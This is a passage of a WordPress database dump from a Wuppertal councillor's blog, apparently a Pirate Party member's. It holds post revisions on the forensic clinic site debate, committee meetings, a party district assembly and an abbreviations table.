Höhe als Standort nicht für besser geeignet als die Müngstener Strasse und kritisiert die Blockadehaltung des ehemaligen Oberbürgermeisters Jung zu dem Them','Standort für die Forensik','','inherit','closed','closed','','371-revision-v1','','','2015-11-25 08:59:32','2015-11-25 07:59:32','',371,'http://www.ollital.de/wordpress/index.php/2015/11/371-revision-v1/',0,'revision','',0),(374,2,'2015-11-25 11:26:27','2015-11-25 10:26:27','Die \"GroKo\"  schafft Baurecht auf der kleinen Höhe, um für die Forensik einen alternativen Standort zur Müngstener Strasse (Bereitschaftspolizei) zu schaffen. Letzteren hatte das NRW-Ministerium für Gesundheit, Emanzipation, Pflege und Alter bisher favorisiert. Damit stellt sich die \"GroKo\" gegen den einstimmigen Beschluss der BV Uellendahl-Katernberg, die schon seit langem jede Bebauung der Fläche auf der kleinen Fläche anlehnt.\r\n\r\nIm letzten April hatte die Bergische Diakonie Aprath ihr Angebot, die forensische Klinik auf ihrem Gelände zu bauen, zurückgezogen. Im April hatte der Stadtrat den Bau der Forensik auf Lichtscheid mit großer Mehrheit abgelehnt. Auch eine Bürgerinitiative hatte sich gegen\r\ndiesen Standort gewehrt.\r\n\r\nGemessen an den Anforderungen des Ministeriums müsste der Standort an der kleinen Höhe gegenüber der Müngstener Strasse jetzt bevorzugt werden.\r\n\r\nDie Fraktion Bündnis 90 / Die Grünen hält in einer Stellungnajhme die kleine Höhe als Standort nicht für besser geeignet als die Müngstener Strasse und kritisiert die Blockadehaltung des ehemaligen Oberbürgermeisters Jung zu dem Them','Standort für die Forensik','','inherit','closed','closed','','371-revision-v1','','','2015-11-25 11:26:27','2015-11-25 10:26:27','',371,'http://www.ollital.de/wordpress/index.php/2015/11/371-revision-v1/',0,'revision','',0),(375,2,'2015-11-25 13:21:25','2015-11-25 12:21:25','Als Standort für die geplante Forensik im Langerichtsbezirk Wuppertal ist die Kleine Höhe vorgesehen.   Dies wurde heute auf einer Pressekonferenz der zuständigen Ministerin bekanntgegeben.\r\n\r\nIm letzten April hatte die Bergische Diakonie Aprath ihr Angebot, die forensische Klinik auf ihrem Gelände zu bauen, zurückgezogen.Im April hatte der Stadtrat den Bau der Forensik auf Lichtscheid mit großer Mehrheit abgelehnt. Auch eine Bürgerinitiative hatte sich gegen\r\n\r\ndiesen Standort gewehrt.\r\n\r\nGemessen an den Anforderungen des Ministeriums müsste der Standort an der kleinen Höhe gegenüber der Müngstener Strasse jetzt bevorzugt werden.\r\n\r\nDie Fraktion Bündnis 90 / Die Grünen hält in einer Stellungnahme die kleine Höhe als Standort nicht für besser geeignet als die Müngstener Strasse und kritisiert die Blockadehaltung des ehemaligen Oberbürgermeisters Jung zu dem Thema.','Standort für die Forensik','','inherit','closed','closed','','371-revision-v1','','','2015-11-25 13:21:25','2015-11-25 12:21:25','',371,'http://www.ollital.de/wordpress/index.php/2015/11/371-revision-v1/',0,'revision','',0),(376,2,'2015-11-25 13:22:52','2015-11-25 12:22:52','Als Standort für die geplante Forensik im Langerichtsbezirk Wuppertal ist die Kleine Höhe vorgesehen.   Dies wurde heute auf einer Pressekonferenz der zuständigen Ministerin bekanntgegeben.\r\n\r\nIm letzten April hatte die Bergische Diakonie Aprath ihr Angebot, die forensische Klinik auf ihrem Gelände zu bauen, zurückgezogen.Im April hatte der Stadtrat den Bau der Forensik auf Lichtscheid mit großer Mehrheit abgelehnt. Auch eine Bürgerinitiative hatte sich gegen den Bau auf dem Gelände der Bereitschaftspolizei gewehrt.\r\n\r\nDie Fraktion Bündnis 90 / Die Grünen hält in einer Stellungnahme die kleine Höhe als Standort nicht für besser geeignet als die Müngstener Strasse und kritisiert die Blockadehaltung des ehemaligen Oberbürgermeisters Jung zu dem Thema.','Standort für die Forensik','','inherit','closed','closed','','371-revision-v1','','','2015-11-25 13:22:52','2015-11-25 12:22:52','',371,'http://www.ollital.de/wordpress/index.php/2015/11/371-revision-v1/',0,'revision','',0),(377,2,'2015-11-25 14:07:25','2015-11-25 13:07:25','Als Standort für die geplante Forensik im Langerichtsbezirk Wuppertal ist die Kleine Höhe vorgesehen.   Dies wurde heute auf einer Pressekonferenz der zuständigen Ministerin Steffensbekanntgegeben.\r\n\r\nIm letzten April hatte die Bergische Diakonie Aprath ihr Angebot, die forensische Klinik auf ihrem Gelände zu bauen, zurückgezogen.Im April hatte der Stadtrat den Bau der Forensik auf Lichtscheid mit großer Mehrheit abgelehnt. Auch eine Bürgerinitiative hatte sich gegen den Bau auf dem Gelände der Bereitschaftspolizei gewehrt.\r\n\r\nDie Fraktion Bündnis 90 / Die Grünen hält in einer Stellungnahme die kleine Höhe als Standort nicht für besser geeignet als die Müngstener Strasse und kritisiert die Blockadehaltung des ehemaligen Oberbürgermeisters Jung zu dem Thema.','Standort für die Forensik','','inherit','closed','closed','','371-revision-v1','','','2015-11-25 14:07:25','2015-11-25 13:07:25','',371,'http://www.ollital.de/wordpress/index.php/2015/11/371-revision-v1/',0,'revision','',0),(378,2,'2015-11-25 14:07:34','2015-11-25 13:07:34','Als Standort für die geplante Forensik im Langerichtsbezirk Wuppertal ist die Kleine Höhe vorgesehen.   Dies wurde heute auf einer Pressekonferenz der zuständigen Ministerin Steffens bekanntgegeben.\r\n\r\nIm letzten April hatte die Bergische Diakonie Aprath ihr Angebot, die forensische Klinik auf ihrem Gelände zu bauen, zurückgezogen.Im April hatte der Stadtrat den Bau der Forensik auf Lichtscheid mit großer Mehrheit abgelehnt. Auch eine Bürgerinitiative hatte sich gegen den Bau auf dem Gelände der Bereitschaftspolizei gewehrt.\r\n\r\nDie Fraktion Bündnis 90 / Die Grünen hält in einer Stellungnahme die kleine Höhe als Standort nicht für besser geeignet als die Müngstener Strasse und kritisiert die Blockadehaltung des ehemaligen Oberbürgermeisters Jung zu dem Thema.','Standort für die Forensik','','inherit','closed','closed','','371-revision-v1','','','2015-11-25 14:07:34','2015-11-25 13:07:34','',371,'http://www.ollital.de/wordpress/index.php/2015/11/371-revision-v1/',0,'revision','',0),(379,2,'2015-11-26 14:04:39','0000-00-00 00:00:00','Wie es in Politik und Verwaltung üblich ist, werden eine Menge Abkürzungen verwendet. Damit niemand den Durchblick  verliert, hier eine kleine Übersicht.','Abkürzungen','','draft','closed','closed','','','','','2015-11-26 14:04:39','2015-11-26 13:04:39','',0,'http://www.ollital.de/wordpress/?page_id=379',0,'page','',0),(380,2,'2015-11-26 14:05:07','2015-11-26 13:05:07','[[\"Abk\\u00fcrzung\",\"Bedeutung\"],[\"GMW\",\"Geb\\u00e4udemanagement Wuppertal\"],[\"StaWiBau\",\"Auschuss f\\u00fcr Stadentwicklung, Wirtschaft und Bauen\"],[\"FraSi\",\"Fraktionssitzung\"],[\"B-Plan\",\"Bebauungsplan\"],[\"BA\",\"Betriebsauschuss\"],[\"BV\",\"Bezirksvertretung\"],[\"HA\",\"Hauptauschuss\"],[\"RIS\",\"Ratsinformationssystem\"],[\"GO NRW\",\"Gemeineordnung Nordrhein-Westfalen\"],[\"GO \",\"Gesch\\u00e4ftsordnung\"]]','Abkürzungen','','publish','closed','closed','','abkurzungen','','','2015-11-27 12:13:31','2015-11-27 11:13:31','',0,'http://www.ollital.de/wordpress/?post_type=tablepress_table&p=380',0,'tablepress_table','application/json',0),(381,2,'2015-11-26 14:07:50','2015-11-26 13:07:50','[[\"Abk\\u00fcrzung\",\"Bedeutung\"],[\"GMW\",\"Geb\\u00e4udemanagement Wuppertal\"],[\"StaWiBau\",\"Auschuss f\\u00fcr Stadentwicklung, Wirtschaft und Bauen\"],[\"FraSi\",\"Fraktionssitzung\"],[\"B-Plan\",\"Bebauungsplan\"],[\"BA\",\"Betriebsauschuss\"]]','Abkürzungen','','inherit','closed','closed','','380-revision-v1','','','2015-11-26 14:07:50','2015-11-26 13:07:50','',380,'http://www.ollital.de/wordpress/index.php/2015/11/380-revision-v1/',0,'revision','',0),(382,2,'2015-11-26 14:10:26','2015-11-26 13:10:26','Politik und Verwaltung bedienen sich einer Menge Abkürzungen. Für eine bessere Lesbarkeit erkläre ich hier die wichtigsten:\r\n\r\n[table id=3 /]','Abkürzungen','','publish','closed','closed','','abkurzungen','','','2015-11-26 14:10:26','2015-11-26 13:10:26','',0,'http://www.ollital.de/wordpress/?page_id=382',0,'page','',0),(383,2,'2015-11-26 14:10:00','2015-11-26 13:10:00','Politik und Verwaltung bedienen sich einer Menge Abkürzungen. Für eine bessere Lesbarkeit erkläre ich hier die wichtigsten:\r\n\r\n[table id=3 /]','Abkürzungen','','inherit','closed','closed','','382-revision-v1','','','2015-11-26 14:10:00','2015-11-26 13:10:00','',382,'http://www.ollital.de/wordpress/index.php/2015/11/382-revision-v1/',0,'revision','',0),(384,2,'2015-11-26 14:12:48','2015-11-26 13:12:48',' ','','','publish','closed','closed','','384','','','2015-11-27 07:03:36','2015-11-27 06:03:36','',0,'http://www.ollital.de/wordpress/?p=384',4,'nav_menu_item','',0),(385,2,'2015-11-26 15:12:19','0000-00-00 00:00:00',' ','','','draft','closed','closed','','','','','2015-11-26 15:12:19','0000-00-00 00:00:00','',0,'http://www.ollital.de/wordpress/?p=385',1,'nav_menu_item','',0),(386,2,'2015-11-26 19:31:23','2015-11-26 18:31:23','Der BA GMW tagte heute in den Räumen des GMW in der Müngstener Str.\r\nIn einem mündlichen Bericht wurden die energetischen Massnahmen im Zoo erläutert.\r\nAllein die Freiflughalle benötigt soviel Strom wie 60 Einpersonenhaushalte\r\nDie gesamten Energiekosten des Zoos liegen bei etwa 1,8 Mio € pro Jahr\r\nMomentan erfolgt eine Bestandsaufnahme der Gehege, um dann einzelfallbezogene Massnahmen zu entwickeln.\r\n\r\nFür mehrere geplante städtische Kindertageseinrichtungen sind die Grundsatz- bzw. Durchführungsbeschlüsse\r\nerfolgt. Darunter fallen:\r\n
                                                                  \r\n
                                                                • Neviandtstr. 85/87
                                                                • \r\n
                                                                • im Bereich Heckinghausen
                                                                • \r\n
                                                                • Staubenthaler Str. 39
                                                                • \r\n
                                                                • Bromberger Str. (ehem. Sportplatz Schützenstr.)
                                                                • \r\n
                                                                • Wilkhausstr. 131/133
                                                                • \r\n
                                                                • Ahrstr.
                                                                • \r\n
                                                                \r\n\r\nFür die Sanierung des Freibads Mählersbeck wird ein Förderantrag an das Zukunftsinvestionsprogramm des Bundes gestellt. Dazu wird es am 09.12.2015 einen Workshop geben, in dem alle Beteiligten über die notwendigen Maßnahmen beraten sollen.\r\n\r\nWie in allen anderen Aschüssen derzeit wurde abschließend über den vorgelegten Haushaltsplan und die Umsetzung des Bundesinvestitionsprogramm befunden.\r\n','BA Gebäudemanagement am 26.11.2015','','publish','open','open','','ba-gebaudemanagement-am-26-11-2015','','','2015-11-26 22:34:50','2015-11-26 21:34:50','',0,'http://www.ollital.de/wordpress/?p=386',0,'post','',0),(387,2,'2015-11-26 16:45:14','2015-11-26 15:45:14','Energetische Massnahmen im Zoo.\r\n * Freiflughalle benötigt soviel Strom wie 60 Einpersonenhaushalte\r\n* Energiekosten 1,8 Mio €\r\n* Bestandsaufnahme der Gehege.\r\nstädtische Kindertageseinrichtungen\r\nSanierung Mählersbeck 09.12.2015\r\nHaushaltsplan\r\n','GMW 26.11.2015','','inherit','closed','closed','','386-revision-v1','','','2015-11-26 16:45:14','2015-11-26 15:45:14','',386,'http://www.ollital.de/wordpress/index.php/2015/11/386-revision-v1/',0,'revision','',0),(388,2,'2015-11-26 19:30:03','2015-11-26 18:30:03','Der BA GMW tagte heute in den Räumen des GMW in der Müngstener Str.\r\nIn einem mündlichen Bericht wurden die energetischen Massnahmen im Zoo erläutert.\r\nAllein die Freiflughalle benötigt soviel Strom wie 60 Einpersonenhaushalte\r\nDie gesamten Energiekosten des Zoos liegen bei etwa 1,8 Mio € pro Jahr\r\nMomentan erfolgt eine Bestandsaufnahme der Gehege.\r\nFür mehrere geplante städtische Kindertageseinrichtungen sind die Grundsatz- bzw. Durchführungsbeschlüsse\r\nerfolgt. Darunter fallen:\r\n
                                                                  \r\n
                                                                • Neviandtstr. 85/87
                                                                • \r\n
                                                                • im Bereich Heckinghausen
                                                                • \r\n
                                                                • Staubenthaler Str. 39
                                                                • \r\n
                                                                • Bromberger str. (eh. Sportplatz Schützenstr.)
                                                                • \r\n
                                                                • Wilkhausstr. 131/133
                                                                • \r\n
                                                                • Ahrstr.
                                                                • \r\n
                                                                \r\n\r\nFür die Sanierung des Freibads Mählersbeckwird ein Förderantrag an das Zukunftsinvestionsprogramm des Bundes gestellt. Dazu wird es am 09.12.2015 einen Workshop geben, in dem alle Beteiligten über die notwendigen Maßnahmen beraten sollen.\r\n\r\nWie in allen anderen Aschüssen derzeit wurde abschlißend über den vorgelegten Haushaltsplan und die Umsetzung des Bundesinvestitionsprogramm befunden.\r\n','GMW 26.11.2015','','inherit','closed','closed','','386-revision-v1','','','2015-11-26 19:30:03','2015-11-26 18:30:03','',386,'http://www.ollital.de/wordpress/index.php/2015/11/386-revision-v1/',0,'revision','',0),(389,2,'2015-11-26 19:31:23','2015-11-26 18:31:23','Der BA GMW tagte heute in den Räumen des GMW in der Müngstener Str.\r\nIn einem mündlichen Bericht wurden die energetischen Massnahmen im Zoo erläutert.\r\nAllein die Freiflughalle benötigt soviel Strom wie 60 Einpersonenhaushalte\r\nDie gesamten Energiekosten des Zoos liegen bei etwa 1,8 Mio € pro Jahr\r\nMomentan erfolgt eine Bestandsaufnahme der Gehege.\r\nFür mehrere geplante städtische Kindertageseinrichtungen sind die Grundsatz- bzw. Durchführungsbeschlüsse\r\nerfolgt. Darunter fallen:\r\n
                                                                  \r\n
                                                                • Neviandtstr. 85/87
                                                                • \r\n
                                                                • im Bereich Heckinghausen
                                                                • \r\n
                                                                • Staubenthaler Str. 39
                                                                • \r\n
                                                                • Bromberger Str. (ehem. Sportplatz Schützenstr.)
                                                                • \r\n
                                                                • Wilkhausstr. 131/133
                                                                • \r\n
                                                                • Ahrstr.
                                                                • \r\n
                                                                \r\n\r\nFür die Sanierung des Freibads Mählersbeckwird ein Förderantrag an das Zukunftsinvestionsprogramm des Bundes gestellt. Dazu wird es am 09.12.2015 einen Workshop geben, in dem alle Beteiligten über die notwendigen Maßnahmen beraten sollen.\r\n\r\nWie in allen anderen Aschüssen derzeit wurde abschlißend über den vorgelegten Haushaltsplan und die Umsetzung des Bundesinvestitionsprogramm befunden.\r\n','BA Gebäudemanagement am 26.11.2015','','inherit','closed','closed','','386-revision-v1','','','2015-11-26 19:31:23','2015-11-26 18:31:23','',386,'http://www.ollital.de/wordpress/index.php/2015/11/386-revision-v1/',0,'revision','',0),(390,2,'2015-11-26 19:40:42','2015-11-26 18:40:42','Der BA GMW tagte heute in den Räumen des GMW in der Müngstener Str.\r\nIn einem mündlichen Bericht wurden die energetischen Massnahmen im Zoo erläutert.\r\nAllein die Freiflughalle benötigt soviel Strom wie 60 Einpersonenhaushalte\r\nDie gesamten Energiekosten des Zoos liegen bei etwa 1,8 Mio € pro Jahr\r\nMomentan erfolgt eine Bestandsaufnahme der Gehege.\r\nFür mehrere geplante städtische Kindertageseinrichtungen sind die Grundsatz- bzw. Durchführungsbeschlüsse\r\nerfolgt. Darunter fallen:\r\n
                                                                  \r\n
                                                                • Neviandtstr. 85/87
                                                                • \r\n
                                                                • im Bereich Heckinghausen
                                                                • \r\n
                                                                • Staubenthaler Str. 39
                                                                • \r\n
                                                                • Bromberger Str. (ehem. Sportplatz Schützenstr.)
                                                                • \r\n
                                                                • Wilkhausstr. 131/133
                                                                • \r\n
                                                                • Ahrstr.
                                                                • \r\n
                                                                \r\n\r\nFür die Sanierung des Freibads Mählersbeck wird ein Förderantrag an das Zukunftsinvestionsprogramm des Bundes gestellt. Dazu wird es am 09.12.2015 einen Workshop geben, in dem alle Beteiligten über die notwendigen Maßnahmen beraten sollen.\r\n\r\nWie in allen anderen Aschüssen derzeit wurde abschlißend über den vorgelegten Haushaltsplan und die Umsetzung des Bundesinvestitionsprogramm befunden.\r\n','BA Gebäudemanagement am 26.11.2015','','inherit','closed','closed','','386-revision-v1','','','2015-11-26 19:40:42','2015-11-26 18:40:42','',386,'http://www.ollital.de/wordpress/index.php/2015/11/386-revision-v1/',0,'revision','',0),(391,2,'2015-11-26 19:42:00','2015-11-26 18:42:00','Der BA GMW tagte heute in den Räumen des GMW in der Müngstener Str.\r\nIn einem mündlichen Bericht wurden die energetischen Massnahmen im Zoo erläutert.\r\nAllein die Freiflughalle benötigt soviel Strom wie 60 Einpersonenhaushalte\r\nDie gesamten Energiekosten des Zoos liegen bei etwa 1,8 Mio € pro Jahr\r\nMomentan erfolgt eine Bestandsaufnahme der Gehege.\r\nFür mehrere geplante städtische Kindertageseinrichtungen sind die Grundsatz- bzw. Durchführungsbeschlüsse\r\nerfolgt. Darunter fallen:\r\n
                                                                  \r\n
                                                                • Neviandtstr. 85/87
                                                                • \r\n
                                                                • im Bereich Heckinghausen
                                                                • \r\n
                                                                • Staubenthaler Str. 39
                                                                • \r\n
                                                                • Bromberger Str. (ehem. Sportplatz Schützenstr.)
                                                                • \r\n
                                                                • Wilkhausstr. 131/133
                                                                • \r\n
                                                                • Ahrstr.
                                                                • \r\n
                                                                \r\n\r\nFür die Sanierung des Freibads Mählersbeck wird ein Förderantrag an das Zukunftsinvestionsprogramm des Bundes gestellt. Dazu wird es am 09.12.2015 einen Workshop geben, in dem alle Beteiligten über die notwendigen Maßnahmen beraten sollen.\r\n\r\nWie in allen anderen Aschüssen derzeit wurde abschließend über den vorgelegten Haushaltsplan und die Umsetzung des Bundesinvestitionsprogramm befunden.\r\n','BA Gebäudemanagement am 26.11.2015','','inherit','closed','closed','','386-revision-v1','','','2015-11-26 19:42:00','2015-11-26 18:42:00','',386,'http://www.ollital.de/wordpress/index.php/2015/11/386-revision-v1/',0,'revision','',0),(392,2,'2015-11-26 22:32:40','2015-11-26 21:32:40','[[\"Abk\\u00fcrzung\",\"Bedeutung\"],[\"GMW\",\"Geb\\u00e4udemanagement Wuppertal\"],[\"StaWiBau\",\"Auschuss f\\u00fcr Stadentwicklung, Wirtschaft und Bauen\"],[\"FraSi\",\"Fraktionssitzung\"],[\"B-Plan\",\"Bebauungsplan\"],[\"BA\",\"Betriebsauschuss\"],[\"BV\",\"Bezirksvertretung\"],[\"HA\",\"Hauptauschuss\"]]','Abkürzungen','','inherit','closed','closed','','380-revision-v1','','','2015-11-26 22:32:40','2015-11-26 21:32:40','',380,'http://www.ollital.de/wordpress/index.php/2015/11/380-revision-v1/',0,'revision','',0),(393,2,'2015-11-26 22:34:50','2015-11-26 21:34:50','Der BA GMW tagte heute in den Räumen des GMW in der Müngstener Str.\r\nIn einem mündlichen Bericht wurden die energetischen Massnahmen im Zoo erläutert.\r\nAllein die Freiflughalle benötigt soviel Strom wie 60 Einpersonenhaushalte\r\nDie gesamten Energiekosten des Zoos liegen bei etwa 1,8 Mio € pro Jahr\r\nMomentan erfolgt eine Bestandsaufnahme der Gehege, um dann einzelfallbezogene Massnahmen zu entwickeln.\r\n\r\nFür mehrere geplante städtische Kindertageseinrichtungen sind die Grundsatz- bzw. Durchführungsbeschlüsse\r\nerfolgt. Darunter fallen:\r\n
                                                                  \r\n
                                                                • Neviandtstr. 85/87
                                                                • \r\n
                                                                • im Bereich Heckinghausen
                                                                • \r\n
                                                                • Staubenthaler Str. 39
                                                                • \r\n
                                                                • Bromberger Str. (ehem. Sportplatz Schützenstr.)
                                                                • \r\n
                                                                • Wilkhausstr. 131/133
                                                                • \r\n
                                                                • Ahrstr.
                                                                • \r\n
                                                                \r\n\r\nFür die Sanierung des Freibads Mählersbeck wird ein Förderantrag an das Zukunftsinvestionsprogramm des Bundes gestellt. Dazu wird es am 09.12.2015 einen Workshop geben, in dem alle Beteiligten über die notwendigen Maßnahmen beraten sollen.\r\n\r\nWie in allen anderen Aschüssen derzeit wurde abschließend über den vorgelegten Haushaltsplan und die Umsetzung des Bundesinvestitionsprogramm befunden.\r\n','BA Gebäudemanagement am 26.11.2015','','inherit','closed','closed','','386-revision-v1','','','2015-11-26 22:34:50','2015-11-26 21:34:50','',386,'http://www.ollital.de/wordpress/index.php/2015/11/386-revision-v1/',0,'revision','',0),(395,2,'2015-11-27 07:04:45','2015-11-27 06:04:45','[[\"Abk\\u00fcrzung\",\"Bedeutung\"],[\"GMW\",\"Geb\\u00e4udemanagement Wuppertal\"],[\"StaWiBau\",\"Auschuss f\\u00fcr Stadentwicklung, Wirtschaft und Bauen\"],[\"FraSi\",\"Fraktionssitzung\"],[\"B-Plan\",\"Bebauungsplan\"],[\"BA\",\"Betriebsauschuss\"],[\"BV\",\"Bezirksvertretung\"],[\"HA\",\"Hauptauschuss\"],[\"RIS\",\"Ratsinformationssystem\"]]','Abkürzungen','','inherit','closed','closed','','380-revision-v1','','','2015-11-27 07:04:45','2015-11-27 06:04:45','',380,'http://www.ollital.de/wordpress/index.php/2015/11/380-revision-v1/',0,'revision','',0),(396,2,'2015-11-27 12:13:31','2015-11-27 11:13:31','[[\"Abk\\u00fcrzung\",\"Bedeutung\"],[\"GMW\",\"Geb\\u00e4udemanagement Wuppertal\"],[\"StaWiBau\",\"Auschuss f\\u00fcr Stadentwicklung, Wirtschaft und Bauen\"],[\"FraSi\",\"Fraktionssitzung\"],[\"B-Plan\",\"Bebauungsplan\"],[\"BA\",\"Betriebsauschuss\"],[\"BV\",\"Bezirksvertretung\"],[\"HA\",\"Hauptauschuss\"],[\"RIS\",\"Ratsinformationssystem\"],[\"GO NRW\",\"Gemeineordnung Nordrhein-Westfalen\"],[\"GO \",\"Gesch\\u00e4ftsordnung\"]]','Abkürzungen','','inherit','closed','closed','','380-revision-v1','','','2015-11-27 12:13:31','2015-11-27 11:13:31','',380,'http://www.ollital.de/wordpress/index.php/2015/11/380-revision-v1/',0,'revision','',0),(397,2,'2015-11-28 19:48:00','2015-11-28 18:48:00','','120px-PIRATENsignet','','inherit','open','closed','','120px-piratensignet','','','2015-11-28 19:48:00','2015-11-28 18:48:00','',0,'http://www.ollital.de/wordpress/wp-content/uploads/2015/11/120px-PIRATENsignet.png',0,'attachment','image/png',0),(398,2,'2015-11-28 23:06:09','2015-11-28 22:06:09','Turnusgemäß fand heute abend die Kreismitgliederversammlung der Wuppertaler Piraten statt.\r\nWichtigster Punkte auf der Tagesordnung waren die Berichte und Wahl der Büropiraten. Die bisherigen Amtsinhaber traten alle wieder an und wurden \r\nen bloc alle bei einer Enthaltung einstimmig wiedergewählt.\r\nDas neue Büropiratenteam setzt sich wie folgt zusammen:\r\n\r\n[table id=4 /]\r\n\r\nViel Erfolg für eure Arbeit im nächsten Jahr.\r\nIn einem selbstbeantragten Tagesordnungspunkt konnte ich allen über meine bisherige Ratsarbeit berichten. Danach wurde noch über einige aktuelle und organisatorischen Themen diskutiert.','Kreismitgliederversammlung 2015.1','','publish','open','open','','kreismitgliederversammlung-2015-1','','','2015-11-28 23:06:09','2015-11-28 22:06:09','',0,'http://www.ollital.de/wordpress/?p=398',0,'post','',0),(399,2,'2015-11-28 23:01:04','2015-11-28 22:01:04','Turnusgemäß fand heute abend die Kreismitgliederversammlung der Wuppertaler Piraten statt.\r\nWichtigster Punkte auf der Tagesordnung waren die Berichte und Wahl der Büropiraten. Die bisherigen Amtsinhaber traten alle wieder an und wurden \r\nen bloc alle einstimmig wiedergewählt.','Kreismitgliederversammlung 2015.1','','inherit','closed','closed','','398-revision-v1','','','2015-11-28 23:01:04','2015-11-28 22:01:04','',398,'http://www.ollital.de/wordpress/index.php/2015/11/398-revision-v1/',0,'revision','',0),(400,2,'2015-11-28 23:02:11','2015-11-28 22:02:11','[[\"Ralph Urban\"],[\"Franz Rudolf B\\u00fcning\"],[\"Jonathan Benedict H\\u00fctter\"],[\"Stefan Kottas\"]]','Büropiratenwahl 2015','','publish','closed','closed','','buropiratenwahl-2015','','','2015-11-28 23:06:34','2015-11-28 22:06:34','',0,'http://www.ollital.de/wordpress/?post_type=tablepress_table&p=400',0,'tablepress_table','application/json',0),(401,2,'2015-11-28 23:03:10','2015-11-28 22:03:10','[[\"Ralph Urban\"],[\"Franz Rudolf B\\u00fcning\"],[\"Jonathan Benedict H\\u00fctter\"],[\"Stefan Kottas\"]]','Büropiratenwahl 2015','','inherit','closed','closed','','400-revision-v1','','','2015-11-28 23:03:10','2015-11-28 22:03:10','',400,'http://www.ollital.de/wordpress/index.php/2015/11/400-revision-v1/',0,'revision','',0),(402,2,'2015-11-28 23:06:09','2015-11-28 22:06:09','Turnusgemäß fand heute abend die Kreismitgliederversammlung der Wuppertaler Piraten statt.\r\nWichtigster Punkte auf der Tagesordnung waren die Berichte und Wahl der Büropiraten. Die bisherigen Amtsinhaber traten alle wieder an und wurden \r\nen bloc alle bei einer Enthaltung einstimmig wiedergewählt.\r\nDas neue Büropiratenteam setzt sich wie folgt zusammen:\r\n\r\n[table id=4 /]\r\n\r\nViel Erfolg für eure Arbeit im nächsten Jahr.\r\nIn einem selbstbeantragten Tagesordnungspunkt konnte ich allen über meine bisherige Ratsarbeit berichten. Danach wurde noch über einige aktuelle und organisatorischen Themen diskutiert.','Kreismitgliederversammlung 2015.1','','inherit','closed','closed','','398-revision-v1','','','2015-11-28 23:06:09','2015-11-28 22:06:09','',398,'http://www.ollital.de/wordpress/index.php/2015/11/398-revision-v1/',0,'revision','',0),(403,2,'2015-12-03 10:18:26','2015-12-03 09:18:26','Heute erhielt ich die Einladung zu einer gemeinsamen Sitzung von Sportauschuss und BA GMW am 09.12.2015um 15:30, in der es im TOP 4 um die Sanierung des Freibads Mählersbeck geht. Dazu werden auch die BV Oberbarmen und der Nächstebrecker Bürgerverein eingeladen.\r\nDie öffentliche Sitzung findet in Raum 207 beim GMW, Müngstener Str. 10 statt.\r\n','Freibad Mählersbeck','','publish','open','open','','freibad-mahlersbeck','','','2015-12-03 10:18:27','2015-12-03 09:18:27','',0,'http://www.ollital.de/wordpress/?p=403',0,'post','',0),(404,2,'2015-12-03 10:18:27','2015-12-03 09:18:27','Heute erhielt ich die Einladung zu einer gemeinsamen Sitzung von Sportauschuss und BA GMW am 09.12.2015um 15:30, in der es im TOP 4 um die Sanierung des Freibads Mählersbeck geht. Dazu werden auch die BV Oberbarmen und der Nächstebrecker Bürgerverein eingeladen.\r\nDie öffentliche Sitzung findet in Raum 207 beim GMW, Müngstener Str. 10 statt.\r\n','Freibad Mählersbeck','','inherit','closed','closed','','403-revision-v1','','','2015-12-03 10:18:27','2015-12-03 09:18:27','',403,'http://www.ollital.de/wordpress/index.php/2015/12/403-revision-v1/',0,'revision','',0),(405,2,'2015-12-03 19:30:29','2015-12-03 18:30:29','In der heutigen Sitzung standen so wichtige Dinge wie die Schaffung des Pina Bausch Tanzentrums und der Bericht zur Strategie Wuppertal 2025 auf der Tagesordnung. In letzterem ist auch die geplante Seilbahn eingearbeitet. Dr. Slawig führte aus, dass der Grundsatzbeschluss des Rates zur Seilbahn für den Herbst 2016 erwartet wird, der nächste Schritt ist jetzt der politische Auftrag an die WSW, eine Projektstudie zu erarbeiten und das Bürgerbeteiligungsverfahren einzuleiten.\r\nAuch Beschluss über den Haushalt 2016/17 wurde auf Hauptauschuss und Rat vertagt.','Ausschuss Stadtentwicklung 03.12.2015','','publish','open','open','','ausschuss-stadtentwicklung-03-12-2015','','','2015-12-03 19:30:29','2015-12-03 18:30:29','',0,'http://www.ollital.de/wordpress/?p=405',0,'post','',0),(406,2,'2015-12-03 16:30:23','2015-12-03 15:30:23','In der heutigen Sitzung standen so wichtige Dinge wie die Schaffung des Pina Bausch Tanzentrums und das Zukunftskonzept Wuppertal 2025 auf der Tagesordnung. In letzterem ist auch die geplante Seilbahn eingearbeitet. Dr. Slawig führte aus, dass der Grundsatzbeschluss des Rates zur Seilbahn für den Herbst 2016 erwartet wird, der nächste Schritt ist jetzt der politische Auftrag an die WSW, eine Projektstudie zu erarbeiten und das Bürgerbeteiligungsverfahren einzuleiten.','Ausschuss Stadtentwicklung 03.12.2015','','inherit','closed','closed','','405-revision-v1','','','2015-12-03 16:30:23','2015-12-03 15:30:23','',405,'http://www.ollital.de/wordpress/index.php/2015/12/405-revision-v1/',0,'revision','',0),(407,2,'2015-12-03 16:41:43','2015-12-03 15:41:43','In der heutigen Sitzung standen so wichtige Dinge wie die Schaffung des Pina Bausch Tanzentrums und die Strategie Wuppertal 2025 auf der Tagesordnung. In letzterem ist auch die geplante Seilbahn eingearbeitet. Dr. Slawig führte aus, dass der Grundsatzbeschluss des Rates zur Seilbahn für den Herbst 2016 erwartet wird, der nächste Schritt ist jetzt der politische Auftrag an die WSW, eine Projektstudie zu erarbeiten und das Bürgerbeteiligungsverfahren einzuleiten.\r\n','Ausschuss Stadtentwicklung 03.12.2015','','inherit','closed','closed','','405-revision-v1','','','2015-12-03 16:41:43','2015-12-03 15:41:43','',405,'http://www.ollital.de/wordpress/index.php/2015/12/405-revision-v1/',0,'revision','',0),(408,2,'2015-12-03 16:49:49','2015-12-03 15:49:49','In der heutigen Sitzung standen so wichtige Dinge wie die Schaffung des Pina Bausch Tanzentrums und der Bericht zur Strategie Wuppertal 2025 auf der Tagesordnung. In letzterem ist auch die geplante Seilbahn eingearbeitet. Dr. Slawig führte aus, dass der Grundsatzbeschluss des Rates zur Seilbahn für den Herbst 2016 erwartet wird, der nächste Schritt ist jetzt der politische Auftrag an die WSW, eine Projektstudie zu erarbeiten und das Bürgerbeteiligungsverfahren einzuleiten.\r\n','Ausschuss Stadtentwicklung 03.12.2015','','inherit','closed','closed','','405-revision-v1','','','2015-12-03 16:49:49','2015-12-03 15:49:49','',405,'http://www.ollital.de/wordpress/index.php/2015/12/405-revision-v1/',0,'revision','',0),(409,2,'2015-12-03 17:03:12','2015-12-03 16:03:12','In der heutigen Sitzung standen so wichtige Dinge wie die Schaffung des Pina Bausch Tanzentrums und der 